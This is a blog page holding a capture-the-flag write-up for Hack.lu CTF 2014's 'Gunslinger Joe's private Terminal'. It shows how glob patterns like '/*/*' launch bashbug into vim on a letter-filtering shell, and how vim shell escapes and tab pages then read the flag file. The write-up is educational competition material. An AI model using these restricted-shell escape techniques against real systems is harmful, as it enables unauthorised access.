<!doctype html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="description" content="Zespre's Blog, Sometimes, we generate bugs">


        <title>Hack.lu CTF 2014: Gunslinger Joe’s private Terminal Writeup // Zespre's Blog // Sometimes, we generate bugs</title>


    <link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/pure/0.3.0/pure-min.css">
    <link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/font-awesome/4.1.0/css/font-awesome.min.css">
    <link rel="stylesheet" href="/theme/css/pure.css">
    <link rel="stylesheet" href="/theme/css/pygments.css">

    <script src="//cdnjs.cloudflare.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>
    <script src="//cdnjs.cloudflare.com/ajax/libs/fitvids/1.0.1/jquery.fitvids.min.js"></script>
    <script>
        $(document).ready(function(){
            $(".content").fitVids();
        });
    </script>
</head>

<body>
<div class="pure-g-r" id="layout">
    <div class="sidebar sidebar-article pure-u">
        <header class="header-article">
            <hgroup>
                <a href="/author/zespre-schmidt.html" title="See posts by Zespre Schmidt">
                        <img class="avatar" alt="Zespre Schmidt" src="http://www.gravatar.com/avatar/93724215aa2d5a9f23d47bda8208073b">
                </a>
                <h2 class="article-info">Zespre Schmidt</h2>
                <small class="about-author">Bug generator</small>
                <h5>Published</h5>
                <p>Tue 21 October 2014</p>
                <a href="/">&larr;Home</a>
            </hgroup>
        </header>
    </div>
    <div class="pure-u">
        <div class="content">
            <section class="post">
                <header class="post-header">
                    <h1>Hack.lu CTF 2014: Gunslinger Joe’s private Terminal Writeup</h1>
                        <p class="post-meta">
                            // under                                 <a class="post-category" href="/tag/ctf/">ctf</a>
                                <a class="post-category" href="/tag/writeup/">writeup</a>
                                <a class="post-category" href="/tag/hacklu/">hacklu</a>
                        </p>
                </header>
            </section>
            <div class="section" id="problem-description">
<h2>Problem Description</h2>
<p>In the Hack.lu CTF website, there are some description about &quot;Gunslinger Joe's
private Terminal&quot;:</p>
<blockquote>
<p>Gunslinger Joe's private Terminal
by cutz (Misc)
50 (+20) Points
Gunslinger Joe has a pretty bad memory and always forgets the password for his
private terminals! That's why he always uses his username as password but also
makes sure that absolutely no one else who knows his name can interact with his
secure terminal. Wouldn't it be super embarrassing for him to prove him wrong?</p>
<p>SSH: <a class="reference external" href="mailto:gunslinger_joe&#64;wildwildweb.fluxfingers.net">gunslinger_joe&#64;wildwildweb.fluxfingers.net</a>
PORT: 1403</p>
</blockquote>
<p>According to the description above, Gunslinger Joe's SSH account and password
are both &quot;gunslinger_joe&quot;. So let's connect to the SSH server:</p>
<div class="highlight"><pre><span class="nv">$ </span>ssh wildwildweb.fluxfingers.net -l gunslinger_joe -p 1403
gunslinger_joe@wildwildweb.fluxfingers.net<span class="s1">&#39;s password:</span>

<span class="s1">           ,&#39;</span>-<span class="s1">&#39;,</span>
<span class="s1">          :-----:</span>
<span class="s1">      (&#39;&#39;&#39;</span> , - , <span class="s1">&#39;&#39;&#39;)</span>
<span class="s1">      \   &#39;</span> .  , <span class="sb">`</span>  /
       <span class="se">\ </span> <span class="s1">&#39;   ^  ? /</span>
<span class="s1">        \ `   -  ,&#39;</span>
         <span class="sb">`</span>j_ _,<span class="s1">&#39;       Gunslinger Joe&#39;</span>s
    ,- -<span class="sb">`</span><span class="se">\ \ </span> /f        Private Terminal
  ,-      <span class="se">\_\/</span>_/<span class="s1">&#39;-</span>
<span class="s1"> ,                 `,</span>
<span class="s1"> ,          Joe      ,</span>
<span class="s1">      /\          \</span>
<span class="s1">|    /             \   &#39;</span>,
,   f  :           :<span class="sb">`</span>,  ,
&lt;...<span class="se">\ </span> ,           : ,- <span class="s1">&#39;</span>
<span class="s1">\,,,,\ ;           : j  &#39;</span>
 <span class="se">\ </span>   <span class="se">\ </span>           :/^^^^<span class="s1">&#39;</span>
<span class="s1">  \    \            ; &#39;&#39;&#39;</span>:
    <span class="se">\ </span>  -,         -<span class="sb">`</span>.../
     <span class="s1">&#39;    - -,`,--`</span>
<span class="s1">      \_._&#39;</span>-- <span class="err">&#39;</span>---:

<span class="nv">$ </span>ls
<span class="nv">$ </span>whoami
<span class="nv">$ </span>ls -l
: -: <span class="nb">command </span>not found
</pre></div>
<p>Something weird have just happened... It seems that the shell filtered out all
the alphabetic characters. However, the &quot;FLAG&quot; showed up...</p>
<div class="highlight"><pre><span class="nv">$ </span>*
: ./FLAG: Permission denied
</pre></div>
<p>Apparently, the file FLAG does not have a attribute of execution so the shell
told us it cannot execute the file FLAG. Anyway, using asterisk could reveal
some useful information. Then try it under the root directory.</p>
<div class="highlight"><pre><span class="nv">$ </span>/*
: /bin: Is a directory
</pre></div>
<p>To conclude, with this kind of input (asterisk), the shell will want to execute
the very first file in the directory specified. So let's see what is the first
executable in the <tt class="docutils literal">/bin</tt>.</p>
<div class="highlight"><pre><span class="nv">$ </span>/*/*
</pre></div>
<p>Oops! WTF! It seems that the file <tt class="docutils literal">/bin/bashbug</tt> has been executed. And we
finally got an editor, which is <tt class="docutils literal">vim</tt>.
.. code-block:: text</p>
<blockquote>
<p>From: gunslinger_joe
To: ../../bin/bunzip2
Subject: [50 character or so descriptive subject here (for reference)]</p>
<p>Configuration Information [Automatically generated, do not change]:
Machine: x86_64
OS: linux-gnu
Compiler: gcc
Compilation CFLAGS:  -DPROGRAM='bash' -DCONF_HOSTTYPE='x86_64' -DCONF
OSTYPE='linux-gnu' -DCONF_MACHTYPE='x86_64-unknown-linux-gnu'
-DCONF_VENDOR='unknown' -DLOCALEDIR='//share/locale' -DPACKAGE='bash'
-DSHELL -DHAVE_CONFIG_H   -I.  -I. -I./include -I./lib   -g -O2
uname output: Linux terminal 3.13.0-37-generic #64-Ubuntu SMP Mon Sep 22
21:28:38 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
Machine Type: x86_64-unknown-linux-gnu</p>
<p>Bash Version: 4.3
Patch Level: 30
Release Status: release</p>
<dl class="docutils">
<dt>Description:</dt>
<dd>[Detailed description of the problem, suggestion, or complaint.]</dd>
<dt>Repeat-By:</dt>
<dd>[Describe the sequence of events that causes the problem
to occur.]</dd>
<dt>Fix:</dt>
<dd>[Description of how to fix the problem.  If you don't know a
fix for the problem, don't include this section.]</dd>
</dl>
</blockquote>
<p>Gods be good, we all know that anyone can execute any commands in <tt class="docutils literal">vim</tt> using
<tt class="docutils literal">:! &lt;command&gt;</tt>. So I tried <tt class="docutils literal">:! cat FLAG</tt>. But the system told me there was
no more resources to fork another process to do the work. Where there is a
will, there is a way. Using the tab page feature provided by <tt class="docutils literal">vim</tt> could do
the work! Because <tt class="docutils literal">vim</tt> will not spawn a new process to handle the new tab
page.</p>
</div>
<div class="section" id="flag">
<h2>Flag</h2>
<div class="highlight"><pre>flag{joe_thought_youd_suck_at_bash}
</pre></div>
</div>

            <div class="hr"></div>
            <a href="#" class="go-top">Go Top</a>
<div class="comments">
    <div id="disqus_thread"></div>
    <script type="text/javascript">
        /* * * CONFIGURATION VARIABLES: EDIT BEFORE PASTING INTO YOUR WEBPAGE * * */
        var disqus_shortname = "zespre"; // required: replace example with your forum shortname

        /* * * DON'T EDIT BELOW THIS LINE * * */
        (function() {
            var dsq = document.createElement('script'); dsq.type = 'text/javascript'; dsq.async = true;
            dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
            (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
        })();
    </script>
    <noscript>Please enable JavaScript to view the <a href="http://disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript>
    <a href="http://disqus.com" class="dsq-brlink">comments powered by <span class="logo-disqus">Disqus</span></a>
</div><footer class="footer">
    <p>&copy; Zespre's Blog &ndash;
        Built with <a href="https://github.com/PurePelicanTheme/pure">Pure Theme</a>
        for <a href="http://blog.getpelican.com/">Pelican</a>
    </p>
</footer>        </div>
    </div>
</div>
    <script>
        var $top = $('.go-top');

        // Show or hide the sticky footer button
        $(window).scroll(function() {
            if ($(this).scrollTop() > 200) {
                $top.fadeIn(200);
            } else {
                $top.fadeOut(200);
            }
        });

        // Animate the scroll to top
        $top.click(function(event) {
            event.preventDefault();
            $('html, body').animate({scrollTop: 0}, 300);
        })

        // Makes sure that the href="#" attached to the <a> elements
        // don't scroll you back up the page.
        $('body').on('click', 'a[href="#"]', function(event) {
            event.preventDefault();
        });
    </script>
    <script type="text/javascript">
        var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
        document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
    </script>
    <script type="text/javascript">
        try {
            var pageTracker = _gat._getTracker("UA-56544554-1");
            pageTracker._trackPageview();
            } catch(err) {}
    </script>
</body>
</html>